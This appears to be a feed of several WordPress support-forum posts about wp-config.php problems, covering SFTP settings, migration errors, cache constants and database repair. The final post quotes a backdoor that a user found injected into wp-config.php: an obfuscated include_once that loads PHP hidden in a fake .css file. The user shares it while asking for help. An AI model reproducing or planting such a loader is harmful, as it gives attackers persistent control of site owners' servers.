I found the the plugin v2.9.1/2.9.2 does not work at all when used on a hosting where the files owner is different from the web server owner. In this case every request leads to a ftp/sftp loggin screen, and nothing works. To make everything work again we can:
Please note we use ssh-sftp-updater-support, every plugin installation or update works well, so the ssh-sftp configuration is clean. We have the following in our wp-config.php:
define(‘FS_METHOD’, ‘ssh2’);
define(‘FTP_USER’, ‘ultimate-st2’);
define(‘FTP_PASS’, ‘some-very-strong-password’);
define(‘FTP_HOST’, ‘sftp.picttn.le-pic.org:2200’);
define(‘FTP_SSL’, true);
Thanks for your help !
Emmanuel
]]>I am trying to use the duplicator plugin to migrate different websites, however, since the new update, i encounter this issue while trying to migrate :
wp-config.php : Failed to update the wp-config file.
I have to manually update the wp-config file as a result. Before the update this was not an issue. Why am I getting this issue?
Is it possible to add code to wp-config.php using WPCode plugin?
Regards.
]]>Additionally, this error exposes the entire wp-config.php
file content on the website, revealing sensitive information such as database credentials, authentication keys, and salts. This is a serious security concern, and I urgently need assistance to:
wp-config.php
code from being displayed on the website.nocache_headers()
error that is preventing the website from functioning.wp-config.php
from being displayed in the future.Question: When using the wp-config.php rules noted below – and are connected to Cloudflare via your plugin – is our Cloudflare cache also purged or cleared every time a plugin or theme is updated?
Thank you!
————
define("WPFC_CLEAR_CACHE_AFTER_PLUGIN_UPDATE", true);
define("WPFC_CLEAR_CACHE_AFTER_THEME_UPDATE", true);
]]>I get this message: One or more database tables are unavailable. The database may need to be?repaired.
I click on the link and get this message:
To allow use of this page to automatically repair database problems, please add the following line to your wp-config.php
file. Once this line is added to your config, reload this page.
define('WP_ALLOW_REPAIR', true);
I’ve added this line of code, reload the page (and deleted my browser cache) but nothing happens.
What can I do?
]]>This occured on “correcting” the Wp Settings for the WP Address (URL) and Site Address (URL).
And this was done after the DNS was changed following a site edit.
I have tried editing wp-config.php to specifically define the URL for ‘public_html’ without result.
Thank you for your suggestions.
]]>I found the following lines in my wp-config:
/ff874/ $ra1f = “/var/www/web135014/html/word\x70ress/w\x70\x2dincludes/js/cro\x70/.6aaa2d4f.css”; if (1){ @include_once /* okh */ ($ra1f); } /ff874/ The css file (6aaa2d4f.css) referenced contains php code, as I have seen. Google Chrome keeps telling me that my website is dangerous. The AIOS plugin has also independently switched off the option “File and folder permissions in WordPress regulate access and read and write rights” and has changed the current permission for wp-config.php. Is it possible that the AIOS plugin creates all of this itself or is this an indication of a hacker attack?
]]>